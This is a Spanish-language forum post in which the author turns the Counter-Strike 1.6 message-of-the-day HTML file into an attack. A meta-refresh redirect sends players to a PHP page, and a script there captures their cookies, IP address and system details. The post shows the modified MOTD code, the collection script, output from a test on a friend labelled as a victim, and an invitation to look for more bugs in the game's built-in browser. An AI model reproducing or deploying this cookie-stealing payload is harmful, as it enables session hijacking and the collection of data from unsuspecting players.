aca el code del MOTD.txt
Código
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head> <style type="text/css"> pre { font-family:Verdana,Tahoma; color:#FFB000; } body { background:#000000; margin-left:8px; margin-top:0px; } a { text-decoration: underline; } a:link { color: #FFFFFF; } a:visited { color: #FFFFFF; } a:active { color: #FFFFFF; } a:hover { color: #FFFFFF; text-decoration: underline; } </style> </head> <body scroll="no"> <pre> You are playing Counter-Strike v1.6 Visit the official CS web site @ www.counter-strike.net </pre> </body> </html>
Supongo que sabran que significara todo esto, o lo habran visto alguna vez.
Entonces dije, CARAJO, porque no me di cuenta antes, y buen empeze a "tocar" un poco todo y aqui esta el code con los cambios.
Código
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head> <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://localhost/web.php?cookie="> <style type="text/css"> pre { font-family:Verdana,Tahoma; color:#FFB000; } body { background:#000000; margin-left:8px; margin-top:0px; } a { text-decoration: underline; } a:link { color: #FFFFFF; } a:visited { color: #FFFFFF; } a:active { color: #FFFFFF; } a:hover { color: #FFFFFF; text-decoration: underline; } </style> </head> <body scroll="no"> <pre> You are playing Counter-Strike v1.6 Visit the official CS web site @ www.counter-strike.net </pre> </body> </html>
le puse que se redireccione, a web.php, para sacar cookies, que todavía no me salio nose porque.
aca web.php:
Código
<html> <head> <title>Xss re pillo</html> </head> <body> <?php $ip = $_SERVER['REMOTE_ADDR']; $userAgent = $_SERVER['HTTP_USER_AGENT']; $cookie = $_GET['cookie']; $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie; ?> <script>window.location='http://localhost/web.php?cookie='+document.cookie;</script> </body> </html>
y

ip-víctima:127.0.0.1 sistema operativo:WINNT -Servidor :localhost
- info del server: Apache/2.2.11 (Win32) PHP/5.3.0
lo probe con un amigo y me da su info
obvio que info del server va a ser mi info jajja
bien se peude sacar info por php, pero ahora la gran pregunta, si tantos navegadores poseen bugs, como mozilla,IE, aunque no sea un navegador completo, seria una especie, tendria que tener bugs si son permitidos tambien estos tipos de cosas.
nadie sabe donde se encuentra el "navegador", donde se carga el MOTD.txt
si alguien tiene ganas de buscar, que tenga un poco mas de idea podemos sacar algo de provecho a esto.
PD:Es una mezcla entre bugs y exploits a nivel web-hacking-y bugs y exploits jajaja
saludos